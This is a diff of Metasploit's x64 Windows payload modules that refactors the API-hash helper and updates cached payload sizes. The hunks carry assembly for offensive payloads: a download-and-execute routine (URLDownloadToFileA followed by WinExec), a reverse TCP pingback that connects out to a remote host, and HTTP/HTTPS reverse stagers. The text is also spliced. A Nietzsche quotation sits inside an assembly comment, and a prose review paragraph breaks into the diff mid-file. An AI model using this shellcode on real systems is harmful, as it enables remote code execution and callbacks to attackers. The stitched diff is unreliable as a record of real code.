@@ -119,13 +119,13 @@ def generate(_opts = {}) db #{uuid_as_db} ; PINGBACK_UUID get_pingback_address: push edi ; saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + push #{block_api_hash('ws2_32.dll', 'send')} call ebp ; call send cleanup_socket: ; clear up the socket push edi ; socket handle - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket(socket) ^ if pingback_count > 0 @@ -136,7 +136,7 @@ def generate(_opts = {}) dec [esi+12] sleep: push #{pingback_sleep * 1000} - push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + push #{block_api_hash('kernel32.dll', 'Sleep')} call ebp ;sleep(pingback_sleep * 1000) jmp create_socket ^ diff --git a/modules/payloads/singles/windows/x64/download_exec.rb b/modules/payloads/singles/windows/x64/download_exec.rb index 221dc54a9436b..6628432bed4dc 100644 --- a/modules/payloads/singles/windows/x64/download_exec.rb +++ b/modules/payloads/singles/windows/x64/download_exec.rb @@ -55,7 +55,7 @@ def generate(_opts = {}) LoadLibrary: pop rcx ; rcx points to the dll name. xor byte [rcx+10], 'K' ; null terminator - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA("urlmon.dll") ; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher. @@ -76,7 +76,7 @@ def generate(_opts = {}) xor r9,r9 ; 4th argument sub rsp, 8 push rcx ; 5th argument - mov r10d, #{Rex::Text.block_api_hash('urlmon.dll', 'URLDownloadToFileA')} + mov r10d, #{block_api_hash('urlmon.dll', 'URLDownloadToFileA')} call rbp SetCommand: 
@@ -86,7 +86,7 @@ def generate(_opts = {}) Exec: pop rcx ; 1st argument xor byte [rcx+#{file.length + 7}], 'F' ; null terminator - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')} + mov r10d, #{block_api_hash('kernel32.dll', 'WinExec')} xor rdx, rdx ; 2nd argument ^ @@ -107,7 +107,7 @@ def generate(_opts = {}) if datastore['EXITFUNC'] == 'process' exit_asm = %( xor rcx,rcx - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ) payload << exit_asm @@ -115,7 +115,7 @@ def generate(_opts = {}) elsif datastore['EXITFUNC'] == 'thread' exit_asm = %( xor rcx,rcx - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitThread')} call rbp ) payload << exit_asm diff --git a/modules/payloads/singles/windows/x64/messagebox.rb b/modules/payloads/singles/windows/x64/messagebox.rb index 77c7238b01218..46c3d18e1046b 100644 --- a/modules/payloads/singles/windows/x64/messagebox.rb +++ b/modules/payloads/singles/windows/x64/messagebox.rb @@ -51,20 +51,20 @@ def generate(_opts = {}) exitfunc_asm = %( xor rcx,rcx - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ) if datastore['EXITFUNC'].upcase.strip == 'THREAD' exitfunc_asm = %( - mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')} - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')} + mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')} + mov r10d, #{block_api_hash('kernel32.dll', 'GetVersion')} call rbp add rsp,0x28 cmp al,0x6 jl use_exitthread ; is older than Vista or Server 2003 R2? cmp bl,0xe0 ; check if GetVersion change the hash stored in EBX jne use_exitthread - mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')} + mov ebx, #{block_api_hash('ntdll.dll', 'RtlExitUserThread')} use_exitthread: push 0 
@@ -84,7 +84,7 @@ def generate(_opts = {}) db "user32.dll", 0x00 get_user32: pop rcx - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp mov r9, #{style} call get_text @@ -96,7 +96,7 @@ def generate(_opts = {}) get_title: pop r8 xor rcx,rcx - mov r10d, #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')} + mov r10d, #{block_api_hash('user32.dll', 'MessageBoxA')} call rbp exitfunk: #{exitfunc_asm} diff --git a/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb b/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb index a770635214a83..b6026137b0405 100644 --- a/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb @@ -4,7 +4,7 @@ ## module MetasploitModule - CachedSize = 425 + CachedSize = 422 include Msf::Payload::Windows include Msf::Payload::Single @@ -168,14 +168,14 @@ def generate(_opts = {}) ; perform the call to LoadLibraryA... mov rcx, r14 ; set the param for the library to load - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA( "ws2_32" ) ; perform the call to WSAStartup... mov rdx, r13 ; second param is a pointer to this struct push 0x0101 ; pop rcx ; set the param for the version requested - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')} call rbp ; WSAStartup( 0x0101, &WSAData ); ; stick the retry count on the stack and store it @@ -194,7 +194,7 @@ def generate(_opts = {}) mov rdx, rax ; push SOCK_STREAM inc rax ; mov rcx, rax ; push AF_INET - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')} call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); mov rdi, rax ; save the socket for later 
@@ -204,7 +204,7 @@ def generate(_opts = {}) pop r8 ; pop off the third param mov rdx, r12 ; set second param to pointer to sockaddr struct mov rcx, rdi ; the socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + mov r10d, #{block_api_hash('ws2_32.dll', 'connect')} call rbp ; connect( s, &sockaddr, 16 ); test eax, eax ; non-zero means failure @@ -233,12 +233,12 @@ def generate(_opts = {}) get_pingback_address: pop rdx ; PINGBACK UUID address mov rcx, rdi ; Socket handle - mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + mov r10d, #{block_api_hash('ws2_32.dll', 'send')} call rbp ; call send close_socket: mov rcx, rdi ; Socket handle - mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')} call rbp ; call closesocket ^ if pingback_count > 0 @@ -249,7 +249,7 @@ def generate(_opts = {}) dec r15 ;decrement the pingback retry counter push #{pingback_sleep * 1000} ; 10 seconds pop rcx ; set the sleep function parameter - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')} call rbp ; Sleep() jmp create_socket ; repeat callback ^ diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb index 1a0f5e2c4ee0f..bdb0f216bccd8 100644 --- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb @@ -4,7 +4,7 @@ ## module MetasploitModule - CachedSize = 526 + CachedSize = 525 include Msf::Payload::Stager include Msf::Payload::Windows::BindTcp_x64 diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb index 592a07ad9b3ef..272d6329d7c0c 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb 
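Review bot: The send, closesocket and Sleep lines of x64/pingback_reverse_tcp.rb (hunks @@ -233,12 and @@ -249,7) change the destination register from `r10` to `r10d` inside hunks that otherwise only swap the hash helper, which is an encoding change rather than a rename; the CachedSize drop from 425 to 422 in this file is consistent with one byte saved per instruction. The change looks intentional, since the other call sites in this file already load the hash into `r10d`, but it deserves a sentence in the commit message so the size change is not attributed to the helper. A comment on the first such line, `; hash is a 32-bit value; r10d matches the encoding used by the other calls`, would make the intent visible in the source. The enclosing generate method continues outside the hunk.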
@@ -4,7 +4,7 @@ ## module MetasploitModule - CachedSize = 524 + CachedSize = 523 include Msf::Payload::Stager include Msf::Payload::Windows::BindTcp_x64 diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index cfa5742fbe765..91e3ed1cd2538 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -4,8 +4,8 @@ ## module MetasploitModule - CachedSize = 607 - CachedSizeOverrides = {"windows/x64/custom/reverse_http" => 628} + CachedSize = 586 + CachedSizeOverrides = {"windows/x64/custom/reverse_http" => 606} include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index 709c805df1441..8736bf07eab78 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -4,8 +4,8 @@ ## module MetasploitModule - CachedSize = 638 - CachedSizeOverrides = {"windows/x64/custom/reverse_https" => 659} + CachedSize = 616 + CachedSizeOverrides = {"windows/x64/custom/reverse_https" => 636} include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb index c92387d58c20a..3a672cbed90e2 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb @@ -4,7 +4,7 @@ ## module MetasploitModule - CachedSize = 491 + CachedSize = 490 include Msf::Payload::Stager include Msf::Payload::Windows::ReverseTcp_x64 diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb index f4789b0e1035e..45987b8070c64 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb 
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb @@ -4,8 +4,8 @@ ## module MetasploitModule - CachedSize = 751 - CachedSizeOverrides = {"windows/x64/custom/reverse_winhttp" => 771} + CachedSize = 718 + CachedSizeOverrides = {"windows/x64/custom/reverse_winhttp" => 734} include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb index 8329bb24e6aef..098efe2e8236c 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb @@ -4,8 +4,8 @@ ## module MetasploitModule - CachedSize = 787 - CachedSizeOverrides = {"windows/x64/custom/reverse_winhttps" => 807} + CachedSize = 750 + CachedSizeOverrides = {"windows/x64/custom/reverse_winhttps" => 766} include Msf::Payload::Stager include Msf::Payload::Windows